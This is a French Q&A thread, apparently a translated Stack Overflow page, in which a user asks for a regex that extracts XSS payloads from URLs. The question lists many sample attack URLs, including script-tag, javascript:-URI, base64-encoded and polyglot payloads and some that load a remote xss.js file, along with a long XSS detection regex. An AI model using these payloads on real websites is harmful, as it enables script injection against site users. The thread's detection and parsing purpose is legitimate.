1. Accueil
  2. Question et réponse
  3. Regex pour correspondre à toutes les charges utiles XSS dans la liste suivante

Regex pour correspondre à toutes les charges utiles XSS dans la liste suivante

2017-09-26 11 views
1

J'ai besoin d'une regex qui correspondra à toutes les charges utiles XSS dans la liste suivante (je n'essaie pas de filtrer les requêtes XSS et d'enregistrer les URL en toute sécurité, j'essaie de tirer la charge utile de l'URL elle-même et l'enregistrer dans une variable pour une utilisation ultérieure):Regex pour correspondre à toutes les charges utiles XSS dans la liste suivante

http://www.example.com/subcat.php?id=24\x3c 
http://www.example.com/subcat.php?id=24\x3C 
http://www.example.com/subcat.php?id=24\u003c 
http://www.example.com/subcat.php?id=24\u003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24%3C 
http://www.example.com/subcat.php?id=24&lt 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&LT 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#60 
http://www.example.com/subcat.php?id=24&#060 
http://www.example.com/subcat.php?id=24&#0060 
http://www.example.com/subcat.php?id=24&#00060 
http://www.example.com/subcat.php?id=24&#000060 
http://www.example.com/subcat.php?id=24&#0000060 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#x3c 
http://www.example.com/subcat.php?id=24&#x03c 
http://www.example.com/subcat.php?id=24&#x003c 
http://www.example.com/subcat.php?id=24&#x0003c 
http://www.example.com/subcat.php?id=24&#x00003c 
http://www.example.com/subcat.php?id=24&#x000003c 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#X3c 
http://www.example.com/subcat.php?id=24&#X03c 
http://www.example.com/subcat.php?id=24&#X003c 
http://www.example.com/subcat.php?id=24&#X0003c 
http://www.example.com/subcat.php?id=24&#X00003c 
http://www.example.com/subcat.php?id=24&#X000003c 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#x3C 
http://www.example.com/subcat.php?id=24&#x03C 
http://www.example.com/subcat.php?id=24&#x003C 
http://www.example.com/subcat.php?id=24&#x0003C 
http://www.example.com/subcat.php?id=24&#x00003C 
http://www.example.com/subcat.php?id=24&#x000003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#X3C 
http://www.example.com/subcat.php?id=24&#X03C 
http://www.example.com/subcat.php?id=24&#X003C 
http://www.example.com/subcat.php?id=24&#X0003C 
http://www.example.com/subcat.php?id=24&#X00003C 
http://www.example.com/subcat.php?id=24&#X000003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24<script>alert(123)</script> 
http://www.example.com/subcat.php?id=24<script>alert("hellox worldss");</script> 
http://www.example.com/subcat.php?id=24javascript:alert("hellox worldss") 
http://www.example.com/subcat.php?id=24<img src="javascript:alert('XSS');"> 
http://www.example.com/subcat.php?id=24<img src=javascript:alert(&quot;XSS&quot;)> 
http://www.example.com/subcat.php?id=24<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
http://www.example.com/subcat.php?id=24<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 
http://www.example.com/subcat.php?id=24<IFRAME SRC="javascript:alert('XSS');"></IFRAME> 
http://www.example.com/subcat.php?id=24<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<<SCRIPT>alert("XSS");//<</SCRIPT> 
.... (for all see the URL)

Je ne réussi à trouver un et le modifier pour correspondre à certains, mais pas tous:

<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*i\W*s\W*i\W*n\W*d\W*e\W*x|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\0\/]|['\"])(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\0]*=

pour une exemple voir here, il ne correspondra que ceux qui ont un <script> et certains d'entre eux, il ne fera pas un match complet sur eux. Est-ce que quelqu'un a une meilleure regex qui ne correspondra qu'à la charge utile XSS de l'URL, ou un meilleur moyen de trouver la charge utile XSS? Merci d'avance.

Source

2017-09-26 wahwahwah

+0

double possible de [bibliothèque Python pour le filtrage XSS?] (Https://stackoverflow.com/questions/901369/python-library-for-xss-filtering) – ctwheels

+1

@ctwheels merci! – wahwahwah

+0

@ctwheels hey, j'apprécie, mais ça ne répond pas à ma quête. Je n'essaie pas de filtrer le XSS, j'essaie d'extraire la charge utile de l'URL et de l'enregistrer en tant que variable. – wahwahwah

Répondre

0

a trouvé un moyen de le faire simplement avec une bibliothèque intégrée:

import urlparse 

def find_xss_script(url, query=4): 
    data = urlparse.urlparse(url) 
    return data[query]

Retournera quelque chose comme: id=24&#x000003c;

Source

2017-09-26 18:58:52 wahwahwah

 Questions connexes

  • Aucun problème connexe^_^